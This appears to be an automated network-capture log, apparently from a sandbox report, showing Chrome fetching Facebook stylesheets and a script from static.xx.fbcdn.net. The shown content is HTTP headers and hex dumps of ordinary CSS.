                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC14884INData Raw: 61 36 66 32 7b 72 6f 77 2d 67 61 70 3a 76 61 72 28 2d 2d 72 6f 77 47 61 70 2c 72 65 76 65 72 74 29 7d 2e 78 6d 38 6b 71 72 76 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 76 61 72 28 2d 2d 73 65 70 61 72 61 74 6f 72 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6d 61 72 67 69 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 29 7d 2e 78 6d 39 35 31 73 69 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 39 38 25 2c 36 30 2e 35 25 29 20 72 6f 74 61 74 65 28 31 31 2e 38 33 64 65 67 29 7d 2e 78 6d 64 68 66 63 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 78 31 6c 39 36 72 69 6e 29 7d 2e 78 6d 64 73 35 65 66 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 63 63 65 6e 74 29 7d 2e 78 6d 67 62 72 73 78 7b 2d 77 65 62 6b 69 74 2d 66
                                                                                                                                                                                                                                Data Ascii: a6f2{row-gap:var(--rowGap,revert)}.xm8kqrv{margin-right:var(--separator-menu-item-margin-horizontal)}.xm951si{transform:translate(98%,60.5%) rotate(11.83deg)}.xmdhfcl{font-weight:var(--x1l96rin)}.xmds5ef{border-right-color:var(--accent)}.xmgbrsx{-webkit-f
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 6d 3a 6e 6f 6e 65 7d 2e 78 34 61 33 34 7a 33 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 69 6e 70 75 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 65 72 72 6f 72 2d 61 63 74 69 76 65 29 7d 2e 78 63 6f 6a 75 6e 61 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 69 6e 70 75 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 77 61 72 6e 2d 61 63 74 69 76 65 29 7d 2e 78 6b 34 6f 79 6d 34 3a 61 63 74 69 76 65 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 38 29 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 30 30 70 78 29 7b 2e 78 31 30 6f 32 61 39 34 2e 78 31 30 6f 32 61 39 34 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 7d 40 6d 65 64
                                                                                                                                                                                                                                Data Ascii: m:none}.x4a34z3:active{background-color:var(--input-background-error-active)}.xcojuna:active{background-color:var(--input-background-warn-active)}.xk4oym4:active{transform:scale(.98)}@media (max-width: 900px){.x10o2a94.x10o2a94{flex-direction:column}}@med
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 61 64 64 69 6e 67 2d 74 6f 70 3a 36 70 78 7d 2e 78 31 79 78 32 35 6a 34 7b 6d 61 78 2d 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 36 30 70 78 29 7d 2e 78 31 79 7a 6d 68 69 73 7b 68 65 69 67 68 74 3a 31 36 37 70 78 7d 2e 78 31 79 7a 74 62 64 62 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 7d 2e 78 32 31 66 67 38 30 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 76 61 72 28 2d 2d 74 6f 61 73 74 2d 62 6f 72 64 65 72 2d 77 69 64 74 68 29 7d 2e 78 32 31 78 70 6e 34 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 78 32 33 6a 30 69 34 7b 77 69 64 74 68 3a 32 36 70 78 7d 2e 78 32 33 6b 72 6b 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 76 61 72 28 2d 2d 78 62 61 72 61 7a 6d 29 7d 2e 78 32 35 36 75 39 7a 7b 6d 61
                                                                                                                                                                                                                                Data Ascii: adding-top:6px}.x1yx25j4{max-width:calc(100% - 60px)}.x1yzmhis{height:167px}.x1yztbdb{margin-bottom:16px}.x21fg80{border-bottom-width:var(--toast-border-width)}.x21xpn4{min-height:32px}.x23j0i4{width:26px}.x23krkg{padding-bottom:var(--xbarazm)}.x256u9z{ma
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC14884INData Raw: 31 65 72 6c 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 61 75 74 6f 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 29 7b 2e 78 31 6f 67 33 72 35 31 2e 78 31 6f 67 33 72 35 31 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 38 39 39 70 78 29 7b 2e 78 31 72 69 6b 39 62 65 2e 78 31 72 69 6b 39 62 65 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 38 39 70 78 29 7b 2e 78 31 72 72 32 35 69 6d 2e 78 31 72 72 32 35 69 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 39 35 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 68 65 69 67 68
                                                                                                                                                                                                                                Data Ascii: 1erl{min-height:auto}}@media (max-height: 700px){.x1og3r51.x1og3r51{margin-bottom:4px}}@media (max-width: 899px){.x1rik9be.x1rik9be{padding-bottom:0}}@media (min-height: 700px) and (max-height: 789px){.x1rr25im.x1rr25im{max-width:1095px}}@media (min-heigh


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                20192.168.2.449769157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC604OUTGET /rsrc.php/v3/yb/l/0,cross/fo219H1KM4T.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: zTiG3S2kohKGdwKyfo3uYQ==
                                                                                                                                                                                                                                Expires: Tue, 23 Sep 2025 19:40:03 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: RFlnbe7m/3NaASMgJaQk2iXQ/zdUrqWtoVRy/eiBMMd6y4mns0LXhvKk6sIg/w12Mie+FsMV7xOMvHcWYRFurQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:17 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 16947
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1INData Raw: 2e
                                                                                                                                                                                                                                Data Ascii: .
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 5f 35 31 6c 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 68 65 6c 76 65 74 69 63 61 20 6e 65 75 65 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 73 75 62 70 69 78 65 6c 2d 61 6e 74 69 61 6c 69 61 73 65 64 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 33 70 78 7d 2e 5f 39 6f 6e 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 61 33 38 33 65 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23
                                                                                                                                                                                                                                Data Ascii: _51lp{background-clip:padding-box;display:inline-block;font-family:'helvetica neue', Helvetica, Arial, sans-serif;font-size:10px;-webkit-font-smoothing:subpixel-antialiased;line-height:1.3;min-height:13px}._9on4{background-color:#fa383e;border:2px solid #
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC562INData Raw: 7d 2e 5f 35 35 72 31 2e 5f 31 74 70 37 3a 6e 6f 74 28 3a 66 6f 63 75 73 29 3a 6e 6f 74 28 2e 5f 31 34 38 38 29 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 46 46 46 20 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 75 2f 72 2f 50 6d 6a 53 6b 76 79 71 56 4d 2d 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 72 69 67 68 74 20 38 70 78 20 63 65 6e 74 65 72 7d 2e 5f 35 33 61 30 2e 5f 31 74 70 37 3a 6e 6f 74 28 3a 66 6f 63 75 73 29 3a 6e 6f 74 28 2e 5f 31 34 38 38 29 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 35 46 36 46 37 20 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 75 2f 72 2f 50 6d 6a 53 6b 76 79 71 56 4d 2d 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 72 69 67 68 74 20 38 70 78 20 63 65 6e 74 65 72 7d 2e 5f 35 35 72 31 2e 5f 31 74
                                                                                                                                                                                                                                Data Ascii: }._55r1._1tp7:not(:focus):not(._1488){background:#FFFFFF url(/rsrc.php/v3/yu/r/PmjSkvyqVM-.png) no-repeat right 8px center}._53a0._1tp7:not(:focus):not(._1488){background:#F5F6F7 url(/rsrc.php/v3/yu/r/PmjSkvyqVM-.png) no-repeat right 8px center}._55r1._1t


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                21192.168.2.449766157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC604OUTGET /rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1927INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: V1LRBe9B7pNtkAwnBCE12g==
                                                                                                                                                                                                                                Expires: Sat, 27 Sep 2025 21:23:41 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: vItr18FdR7iODYMOJjQpUjykQaJ7IOEQhcJz14wJL0/L1X1XFa2IkhgDmYsqmjq0xPJVvB8OxD69I7z6yrq1Ow==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:17 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 9187
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1INData Raw: 0a
                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC9186INData Raw: 0a 64 69 76 2e 5f 33 71 77 7b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6c 65 66 74 3a 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 3b 7a 2d 69 6e 64 65 78 3a 34 30 30 7d 2e 5f 33 31 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 65 62 6b 69 74 20 2e 5f 34 32 77 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 77 69 64 74 68 3a 31 70 78 7d 2e 5f 33 69 78 6e 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 5f 33 71 77 20
                                                                                                                                                                                                                                Data Ascii: div._3qw{height:auto;left:0;min-height:100%;position:absolute;right:0;top:0;z-index:400}._31e{position:fixed!important;width:100%}.webkit ._42w{position:absolute;top:0;visibility:hidden;width:1px}._3ixn{bottom:0;left:0;position:fixed;right:0;top:0}._3qw


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                22192.168.2.449768157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC604OUTGET /rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1928INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: 2o+PrDYYhtjScpZayNLM6Q==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 21:23:53 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: HdzaHTSUNoOD40hF/qPFQqKBiKMmQGCQuWrSujGxKhsC6gBq5ha/jyVDPnqvVOInbOGsiP/MCk1rqh1NlfzaKw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:17 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 34412
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC1INData Raw: 23
                                                                                                                                                                                                                                Data Ascii: #
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC15878INData Raw: 6e 61 76 4c 6f 67 69 6e 20 2e 5f 79 6c 34 7b 7a 2d 69 6e 64 65 78 3a 34 7d 2e 5f 79 6c 34 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 32 32 70 78 7d 2e 5f 79 6c 38 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 36 66 37 3b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 20 77 68 69 74 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 33 70 78 20 38 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 68 65 69 67 68 74 3a 32 36 36 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 36 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 5f 79 6c 39 7b 63 6f 6c 6f 72 3a 23 37 66 37 66 37 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e
                                                                                                                                                                                                                                Data Ascii: navLogin ._yl4{z-index:4}._yl4{position:relative;top:22px}._yl8{background-color:#f5f6f7;border:0 solid white;border-radius:3px;box-shadow:0 3px 8px rgba(0, 0, 0, .3);height:266px;padding-bottom:6px;text-align:center}._yl9{color:#7f7f7f;font-size:12px;lin
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC16384INData Raw: 62 74 6e 5f 74 68 69 63 6b 62 61 72 7b 6c 65 66 74 3a 31 38 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 37 30 70 78 7d 2e 73 69 67 6e 75 70 5f 61 72 65 61 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 33 70 78 7d 2e 74 69 6d 65 6c 69 6e 65 4c 61 79 6f 75 74 4c 6f 67 67 65 64 4f 75 74 20 2e 73 69 67 6e 75 70 5f 62 74 6e 7b 6c 65 66 74 3a 32 35 30 70 78 7d 0a 2e 70 61 73 7b 70 61 64 64 69 6e 67 3a 35 70 78 7d 2e 70 61 38 7b 70 61 64 64 69 6e 67 3a 38 70 78 7d 2e 70 61 6d 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 7d 2e 70 61 31 36 7b 70 61 64 64 69 6e 67 3a 31 36 70 78 7d 2e 70 61 6c 7b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 2e 70 74 73 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 70 78 7d 2e 70 74 38 7b 70 61 64 64 69 6e 67 2d 74 6f
                                                                                                                                                                                                                                Data Ascii: btn_thickbar{left:180px;position:absolute;top:-70px}.signup_area{margin-top:23px}.timelineLayoutLoggedOut .signup_btn{left:250px}.pas{padding:5px}.pa8{padding:8px}.pam{padding:10px}.pa16{padding:16px}.pal{padding:20px}.pts{padding-top:5px}.pt8{padding-to
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC2149INData Raw: 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 2d 31 70 78 3b 74 6f 70 3a 2d 31 70 78 7d 0a 2e 5f 34 2d 75 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 39 65 62 65 65 7d 2e 5f 32 61 31 6a 20 2e 5f 36 35 71 71 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 66 62 66 63 7d 2e 5f 36 35 71 71 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 7d 2e 5f 34 36 39 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 5f 34 2d 75 37 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 35 37 38 65 35 7d 2e 5f 35 37 64 38 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 36 66 37 7d 2e 5f 34 2d 75 38 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 0a 2e 5f 35 38 35 6e 7b 62 61
                                                                                                                                                                                                                                Data Ascii: tion:absolute;right:-1px;top:-1px}._4-u5{background-color:#e9ebee}._2a1j ._65qq{background:#fafbfc}._65qq{background:#fff}._469s{background-color:#000}._4-u7{background-color:#3578e5}._57d8{background-color:#f5f6f7}._4-u8{background-color:#fff}._585n{ba


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                23192.168.2.449764157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC581OUTGET /rsrc.php/v3/y1/r/s1oFVSwofs5.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
